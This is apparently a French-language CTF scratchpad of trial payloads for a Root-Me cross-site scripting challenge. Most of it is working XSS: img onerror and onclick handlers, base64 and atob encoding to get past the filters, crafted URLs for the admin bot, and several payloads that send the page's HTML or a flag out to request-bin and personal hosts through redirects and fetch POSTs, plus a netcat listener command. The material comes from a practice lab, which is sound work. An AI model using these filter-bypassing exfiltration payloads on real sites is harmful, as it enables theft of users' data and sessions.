le tag </script> </script> est filtré
le mot http est filtré 

<img src=x onerror=alert(1)>  // si on l'injecte dans le champs de la page index, il affiche alerte 

URL du request bin b91866a14c6fb896d563def99df6178b.m.pipedream.net

le problème : comment faire une redirection ? les CSP filtre le mot HTTP
Fonction de redirection en JS : 
// Simulate a mouse click:
window.location.href = "http://www.w3schools.com";

// Simulate an HTTP redirect:
window.location.replace("http://www.w3schools.com");

document.location.href="https://www.mondomaine.com"
document.location.href="nouvellepage.html"

Test : 

<img src=x onerror=window.location.replace("b91866a14c6fb896d563def99df6178b.m.pipedream.net");> 
<img src=x onerror=window.location.replace("data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=");>
<img src=x onerror=location.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4";>

Ajouter une variable dans la payload: 
<img src=x onerror= var khalil = "moi khalil"; alert(khalil);> 
<img src=x onerror= var khalil = "moi khalil";> <img src=x onerror= alert(khalil);>
<img src=x onerror=>

Convertir en Base 64 en utilisant JS  
alert(1)  ----en Base64----> 
<img src=x onerror=document.write(atob("YWxlcnQoMSk="));> 
window.location.replace("https://b91866a14c6fb896d563def99df6178b.m.pipedream.net"); = 
d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vYjkxODY2YTE0YzZmYjg5NmQ1NjNkZWY5OWRmNjE3OGIubS5waXBlZHJlYW0ubmV0Iik7

<script>window.location.replace("https://b91866a14c6fb896d563def99df6178b.m.pipedream.net");</script>
PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4=

<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4="));> 



On sait jamais le bot click.
<IMG SRC=x onclick="alert(1)">
<button onclick="alert('ok')">Click me</button>
<button onclick="document.write(atob('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4='));">Click me</button>


url  à remonter à l'admin: 


http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4="));> 


FLAG_REDACTED:
http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4="));>&FLAG_REDACTED
http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onclick='document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4="));'>&FLAG_REDACTED
Peut être le binrequest block les XSS, donc j'ouvre le port 80 sur mon vps avec la commande nc -lvp 80

<script>window.location.replace("http://khalilmarref.com");</script> en base 64 : 
<script>window.location.replace("http://khalilmarref.com");</script>
PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cDovL2toYWxpbG1hcnJlZi5jb20iKTs8L3NjcmlwdD4=

<img src=x onclick='document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cDovL2toYWxpbG1hcnJlZi5jb20iKTs8L3NjcmlwdD4="));'> 

http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cDovL2toYWxpbG1hcnJlZi5jb20iKTs8L3NjcmlwdD4="));> 




<script>window.location='https://8052ec5f3ba0d2bbd213ebf2da4c6e76.m.pipedream.net?variable='+FLAG_REDACTED;</script> :
PHNjcmlwdD53aW5kb3cubG9jYXRpb249J2h0dHBzOi8vODA1MmVjNWYzYmEwZDJiYmQyMTNlYmYyZGE0YzZlNzYubS5waXBlZHJlYW0ubmV0P3ZhcmlhYmxlJytGTEFHX1JFREFDVEVEPC9zY3JpcHQ+

http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onclick='document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb249J2h0dHBzOi8vODA1MmVjNWYzYmEwZDJiYmQyMTNlYmYyZGE0YzZlNzYubS5waXBlZHJlYW0ubmV0P3ZhcmlhYmxlJytGTEFHX1JFREFDVEVEPC9zY3JpcHQ+"));'> 
http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb249J2h0dHBzOi8vODA1MmVjNWYzYmEwZDJiYmQyMTNlYmYyZGE0YzZlNzYubS5waXBlZHJlYW0ubmV0P3ZhcmlhYmxlJytGTEFHX1JFREFDVEVEPC9zY3JpcHQ+"));> 



http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9iOTE4NjZhMTRjNmZiODk2ZDU2M2RlZjk5ZGY2MTc4Yi5tLnBpcGVkcmVhbS5uZXQiKTs8L3NjcmlwdD4="));>





Redirection avec le code source: 

<script>fetch('http://challenge01.root-me.org/web-client/ch8/page').then(function (r){return r.text();}).then(function(h){fetch('http://khalilmarref.com',{method: 'POST',body: ''+h+'',});});</script>
PHNjcmlwdD5mZXRjaCgncGFnZScpLnRoZW4oZnVuY3Rpb24gKHIpe3JldHVybiByLnRleHQoKTt9KS50aGVuKGZ1bmN0aW9uKGgpe2ZldGNoKCdodHRwOi8va2hhbGlsbWFycmVmLmNvbScse21ldGhvZDogJ1BPU1QnLGJvZHk6ICcnK2grJycsfSk7fSk7PC9zY3JpcHQ+
http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob("PHNjcmlwdD5mZXRjaCgncGFnZScpLnRoZW4oZnVuY3Rpb24gKHIpe3JldHVybiByLnRleHQoKTt9KS50aGVuKGZ1bmN0aW9uKGgpe2ZldGNoKCdodHRwOi8va2hhbGlsbWFycmVmLmNvbScse21ldGhvZDogJ1BPU1QnLGJvZHk6ICcnK2grJycsfSk7fSk7PC9zY3JpcHQ+"));>



http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob('PHNjcmlwdD5mZXRjaCgnaHR0cDovL2NoYWxsZW5nZTAxLnJvb3QtbWUub3JnL3dlYi1jbGllbnQvY2g4L3BhZ2UnKS50aGVuKGZ1bmN0aW9uIChyKXtyZXR1cm4gci50ZXh0KCk7fSkudGhlbihmdW5jdGlvbihoKXtmZXRjaCgnaHR0cDovL2toYWxpbG1hcnJlZi5jb20nLHttZXRob2Q6ICdQT1NUJyxib2R5OiAnJytoKycnLH0pO30pOzwvc2NyaXB0Pg=='));>

http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob('ZmV0Y2goJy4nKS50aGVuKGZ1bmN0aW9uIChyKXtyZXR1cm4gci50ZXh0KCk7fSkudGhlbihmdW5jdGlvbihoKXtmZXRjaCgnaHR0cDovL2toYWxpbG1hcnJlZi5jb20nLHttZXRob2Q6ICdQT1NUJyxib2R5OiAnJytoKycnLH0pO30pOzwvc2NyaXB0Pg=='));>


http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob('ZmV0Y2goJ3BhZ2UnKS50aGVuKGZ1bmN0aW9uIChyKXtyZXR1cm4gci50ZXh0KCk7fSkudGhlbihmdW5jdGlvbihoKXtmZXRjaCgnaHR0cDovL2toYWxpbG1hcnJlZi5jb20nLHttZXRob2Q6ICdQT1NUJyxib2R5OiAnJytoKycnLH0pO30pOzwvc2NyaXB0Pg=='));>


Requete marche et le bot répond +



//var string = document.documentElement.innerHTML;
//alert(string)
//fetch('page.html').then(function (r){return r.text();}).then(function(h){window.location.replace('https://41b3419c57ce32c94ee5d0f45f04b790.m.pipedream.net/?var= '+h);});
//h = document.getElementsByTagName('html')[0].innerHTML
//alert(h);
//location.replace("https://41b3419c57ce32c94ee5d0f45f04b790.m.pipedream.net/?var="+h);



window.location.replace("http://khalilmarref.com");


<script>var x = document.getElementsByTagName("HTML");window.location.replace("https://6a5fda0f69e7028121f2a1eb384f7f2b.m.pipedream.net/?var="+atob(x[0].innerHTML));</script>

    alert(x[0].innerHTML)
    

    <script>var x = document.getElementsByTagName('HTML');window.location.replace('https://b60347280ff584fda9b04511ce92f286.m.pipedream.net/?var='+btoa(x[0].innerHTML));</script>

    
    http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror=document.write(atob('PHNjcmlwdD52YXIgeCA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdIVE1MJyk7d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vYjYwMzQ3MjgwZmY1ODRmZGE5YjA0NTExY2U5MmYyODYubS5waXBlZHJlYW0ubmV0Lz92YXI9JytidG9hKHhbMF0uaW5uZXJIVE1MKSk7PC9zY3JpcHQ+'));>



    <img src=x onerror= n=document.documentElement.innerHTML;window.location.href=atob('aHR0cHM6Ly83YTlhNGYxNGEwYmJiZjI2ZWEwMGNkYjBiODkwYWM3Yy5tLnBpcGVkcmVhbS5uZXQK')+"?var="+btoa(n);>
    <img src=x onerror= z="ddd";alert(z)>

    http://challenge01.root-me.org/web-client/ch8/page?user=<img src=x onerror= n=document.documentElement.innerHTML;window.location.href=atob('aHR0cHM6Ly83YTlhNGYxNGEwYmJiZjI2ZWEwMGNkYjBiODkwYWM3Yy5tLnBpcGVkcmVhbS5uZXQK')+"?var="+btoa(n);>
    http://challenge01.root-me.org/web-client/ch8/page?user=%3Cimg%20src%3Dx%20onerror%3D%20n%3Ddocument.documentElement.innerHTML%3Bwindow.location.href%3Datob%28%27aHR0cHM6Ly83YTlhNGYxNGEwYmJiZjI2ZWEwMGNkYjBiODkwYWM3Yy5tLnBpcGVkcmVhbS5uZXQK%27%29%2B%22%3Fvar%3D%22%2Bbtoa%28n%29%3B%3E